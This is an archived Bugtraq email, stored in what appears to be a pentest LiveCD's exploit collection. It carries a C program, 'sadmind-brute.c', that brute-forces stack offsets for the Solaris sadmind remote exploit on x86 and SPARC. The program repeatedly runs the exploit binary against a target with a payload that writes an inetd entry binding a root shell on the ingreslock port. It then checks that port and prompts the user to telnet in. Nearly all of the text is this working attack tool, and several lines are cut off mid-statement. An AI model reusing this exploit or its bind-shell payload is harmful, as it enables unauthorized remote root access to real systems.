home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / sadmind-brute.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.7 KB  |  304 lines
  1. From aleph1@SECURITYFOCUS.COM Fri Nov 10 12:43:31 2000
  2. Date: Fri, 10 Nov 2000 09:50:50 -0800
  3. From: Elias Levy <aleph1@SECURITYFOCUS.COM>
  4. To: vuldb@securityfocus.com
  5. Subject: (forw) BUGTRAQ: approval required (2C2CCEC7)
  6.  
  7.  
  8. -- 
  9. Elias Levy
  10. SecurityFocus.com
  11. http://www.securityfocus.com/
  12. Si vis pacem, para bellum
  13.  
  14.     [ Part 2: "Included Message" ]
  15.  
  16. Date: Fri, 10 Nov 2000 04:35:43 -0800
  17. From: "L-Soft list server at SecurityFocus.com (1.8d)"
  18.     <LISTSERV@LISTS.SECURITYFOCUS.COM>
  19. To: Elias Levy <aleph1@SECURITYFOCUS.COM>
  20. Subject: BUGTRAQ: approval required (2C2CCEC7)
  21.  
  22. This message was originally submitted by root@SECURITYFOCUS.COM to the BUGTRAQ
  23. list at LISTS.SECURITYFOCUS.COM. You can  approve it using the "OK" mechanism,
  24. ignore it, or repost an edited copy. The message will expire automatically and
  25. you do not need to do anything if you just want to discard it. Please refer to
  26. the list owner's guide if you are  not familiar with the "OK" mechanism; these
  27. instructions  are  being  kept  purposefully short  for  your  convenience  in
  28. processing large numbers of messages.
  29.  
  30. ----------------- Original message (ID=2C2CCEC7) (274 lines) ------------------
  31. Return-Path: <owner-bugtraq@securityfocus.com>
  32. Delivered-To: bugtraq@lists.securityfocus.com
  33. Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78])
  34.     by lists.securityfocus.com (Postfix) with SMTP id 8431D24C489
  35.     for <bugtraq@lists.securityfocus.com>; Fri, 10 Nov 2000 04:35:43 -0800 (PST)
  36. Received: (qmail 22921 invoked by alias); 10 Nov 2000 12:38:11 -0000
  37. Delivered-To: bugtraq@securityfocus.com
  38. Received: (qmail 22918 invoked from network); 10 Nov 2000 12:38:11 -0000
  39. Received: from www3.securityfocus.com (HELO securityfocus.com) (207.126.127.74)
  40.   by mail.securityfocus.com with SMTP; 10 Nov 2000 12:38:11 -0000
  41. Received: (qmail 6375 invoked by uid 103); 10 Nov 2000 12:34:52 -0000
  42. Date: 10 Nov 2000 12:34:52 -0000
  43. Message-ID: <20001110123452.6374.qmail@securityfocus.com>
  44. From: nikolai abromov <minix@antionline.org>
  45. To: bugtraq@securityfocus.com
  46. X-Mailer: Security Focus
  47. Subject: Re: sadmind exploits (remote sparc/x86)
  48. Sender: root@securityfocus.com
  49.  
  50.  
  51. brute force offset .... 
  52.  
  53.  
  54.  
  55.  
  56. // *** Synnergy Networks
  57.  
  58. #include <stdio.h>
  59. #include <stdlib.h>
  60. #include <signal.h>
  61. #include <string.h>
  62. #include <sys/errno.h>
  63. #include <sys/types.h>
  64. #include <sys/socket.h>
  65. #include <sys/stat.h>
  66. #include <fcntl.h>
  67. #include <netinet/in.h>
  68. #include <netdb.h>
  69. #include <unistd.h>
  70.  
  71. /* *** ATTENTION *** you may have to change some
  72. of these *** ATTENTION *** */
  73. #define EXPX86          "sadmindex-x86"  /*
  74. sadmind exploit for x86 arch */
  75. #define EXPSPARC        "sadmindex-sparc"  /*
  76. sadmind exploit for sparc arch */
  77. #define INC             4  /* sp brute forcing
  78. incrementation - 4 should be ok
  79.  
  80. /* DON'T change the following */
  81. #define FALSE           0  /* false */
  82. #define TRUE            !FALSE  /* true */
  83. #define BINDINGRES      "echo 'ingreslock stream
  84. tcp nowait root /bin/sh sh -i'
  85.                                         > /tmp/.x;
  86. /usr/sbin/inetd -s /tmp/.x;
  87.                                         m -f
  88. /tmp/.x;"  /* bind rootshell */
  89. #define SPX8626         0x080418ec  /* default
  90. sadmindex sp for x86 2.6 */
  91. #define SPX867          0x08041798  /* default
  92. sadmindex sp for x86 7.0 */
  93. #define SPSPARC26       0xefff9580  /* default
  94. sadmindex sp for sparc 2.6 */
  95. #define SPSPARC7        0xefff9418  /* default
  96. sadmindex sp for sparc 7.0 */
  97. #define EXPCMDX8626     "./%s -h %s -c \"%s\" -s
  98. 0x%x -j 512\n"  /* cmd line */
  99. #define EXPCMDX867      "./%s -h %s -c \"%s\" -s
  100. 0x%x -j 536\n"  /* cmd line */
  101. #define EXPCMDSPARC     "./%s -h %s -c \"%s\" -s
  102. 0x%x\n"  /* cmd line */
  103.  
  104. int
  105. main(int argc, char **argv)
  106. {
  107.         int i, sockfd, fd, size = 4096, sign = -1;
  108.         long int addr;
  109.         char *buffer = (char *) malloc (size);
  110.         struct hostent *he;
  111.         struct sockaddr_in their_addr;
  112.         if (argc < 3)
  113.         {
  114.                 fprintf(stderr, "\nsadmindex sp
  115. brute forcer - by elux\n");
  116.                 fprintf(stderr, "usage: %s [arch]
  117. <host>\n\n", argv[0]);
  118.                 fprintf(stderr, "\tarch:\n");
  119.                 fprintf(stderr, "\t1 - x86 Solaris
  120. 2.6\n");
  121.                 fprintf(stderr, "\t2 - x86 Solaris
  122. 7.0\n");
  123.                 fprintf(stderr, "\t3 - SPARC
  124. Solaris 2.6\n");
  125.                 fprintf(stderr, "\t4 - SPARC
  126. Solaris 7.0\n\n");
  127.                 exit(TRUE);
  128.         }
  129.  
  130.         if ( (he = gethostbyname(argv[2])) ==
  131. NULL)
  132.         {
  133.                 printf("Unable to resolve %s\n",
  134. argv[2]);
  135.                 exit(TRUE);
  136.         }
  137.  
  138.         their_addr.sin_family = AF_INET;
  139.         their_addr.sin_port = htons(1524);
  140.         their_addr.sin_addr = *((struct in_addr
  141. *)he->h_addr);
  142.         bzero(&(their_addr.sin_zero), 8);
  143.  
  144.      if ( (strcmp(argv[1], "1")) == 0)
  145.         {
  146.                 addr = SPX8626;
  147.                 printf("\nAlright... sit back and
  148. relax while this program brut
  149.                 for (i = 0; i <= 4096; i += INC)
  150.                 {
  151.                         if ( (sockfd =
  152. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  153.                         {
  154.                                 if (
  155. (connect(sockfd, (struct sockaddr *)&their
  156.                                 {
  157.                                        
  158. fprintf(stderr, "\n\nNow telnet to %s,
  159.                                        
  160. close(sockfd);
  161.                                        
  162. exit(FALSE);
  163.                                 }
  164.                         }
  165.                         if ( (fd = open(EXPX86,
  166. O_RDONLY)) != -1)
  167.                         {
  168.                                 sign *= -1;
  169.                                 addr -= i *sign;
  170.                                 snprintf(buffer,
  171. size, EXPCMDX8626, EXPX86, arg
  172.                                 system(buffer);
  173.                         }
  174.                         else
  175.                    {
  176.                                 printf("\n\n%s
  177. doesn't exisit, you need the sad
  178.                                 exit(TRUE);
  179.                         }
  180.                 }
  181.         }
  182.         else if ( (strcmp(argv[1], "2")) == 0)
  183.         {
  184.                 addr = SPX867;
  185.                 printf("\nAlright... sit back and
  186. relax while this program brut
  187.                 for (i = 0; i <= 4096; i += INC)
  188.                 {
  189.                         if ( (sockfd =
  190. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  191.                         {
  192.                                 if (
  193. (connect(sockfd, (struct sockaddr *)&their
  194.                                 {
  195.                                        
  196. fprintf(stderr, "\n\nNow telnet to %s,
  197.                                        
  198. close(sockfd);
  199.                                        
  200. exit(FALSE);
  201.                                 }
  202.                         }
  203.                         if ( (fd = open(EXPX86,
  204. O_RDONLY)) != -1)
  205.                         {
  206.  
  207.  
  208.                              sign *= -1;
  209.                                 addr -= i *sign;
  210.                                 snprintf(buffer,
  211. size, EXPCMDX867, EXPX86, argv
  212.                                 system(buffer);
  213.                         }
  214.                         else
  215.                         {
  216.                                 printf("\n\n%s
  217. doesn't exisit, you need the sad
  218.                                 exit(TRUE);
  219.                         }
  220.                 }
  221.         }
  222.         else if ( (strcmp(argv[1], "3")) == 0)
  223.         {
  224.                 addr = SPSPARC26;
  225.                 printf("\nAlright... sit back and
  226. relax while this program brut
  227.                 for (i = 0; i <= 4096; i += INC)
  228.                 {
  229.                         if ( (sockfd =
  230. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  231.                         {
  232.                                 if (
  233. (connect(sockfd, (struct sockaddr *)&their
  234.                                 {
  235.                                        
  236. fprintf(stderr, "\n\nNow telnet to %s,
  237.                           close(sockfd);
  238.                                        
  239. exit(FALSE);
  240.                                 }
  241.                         }
  242.                         if ( (fd = open(EXPSPARC,
  243. O_RDONLY)) != -1)
  244.                         {
  245.                                 sign *= -1;
  246.                                 addr -= i *sign;
  247.                                 snprintf(buffer,
  248. size, EXPCMDSPARC, EXPSPARC, a
  249.                                 system(buffer);
  250.                         }
  251.                         else
  252.                         {
  253.                                 printf("\n\n%s
  254. doesn't exisit, you need the sad
  255.                                 exit(TRUE);
  256.                         }
  257.                 }
  258.         }
  259.         else if ( (strcmp(argv[1], "4")) == 0)
  260.         {
  261.                 addr = SPSPARC7;   
  262.                 printf("\nAlright... sit back and
  263. relax while this program brut
  264.                 for (i = 0; i <= 4096; i += INC)
  265.      {
  266.                         if ( (sockfd =
  267. socket(AF_INET, SOCK_STREAM, 0)) != -1)
  268.                         {
  269.                                 if (
  270. (connect(sockfd, (struct sockaddr *)&their
  271.                                 {  
  272.                                        
  273. fprintf(stderr, "\n\nNow telnet to %s,
  274.                                        
  275. close(sockfd);
  276.                                        
  277. exit(FALSE);
  278.                                 }  
  279.                         }
  280.                         if ( (fd = open(EXPSPARC,
  281. O_RDONLY)) != -1)
  282.                         {
  283.                                 sign *= -1;
  284.                                 addr -= i *sign;
  285.                                 snprintf(buffer,
  286. size, EXPCMDSPARC, EXPSPARC, a
  287.                                 system(buffer);
  288.                         }
  289.                         else
  290.                         {
  291.                                 printf("\n\n%s
  292. doesn't exisit, you need the sad
  293.                                 exit(TRUE);
  294.                         }
  295.                 }
  296.  
  297.         }
  298.         else
  299.                 printf("%s is not a supported
  300. arch, try 1 - 4 ... .. .\n", argv
  301. }
  302.  
  303. // EOF
  304.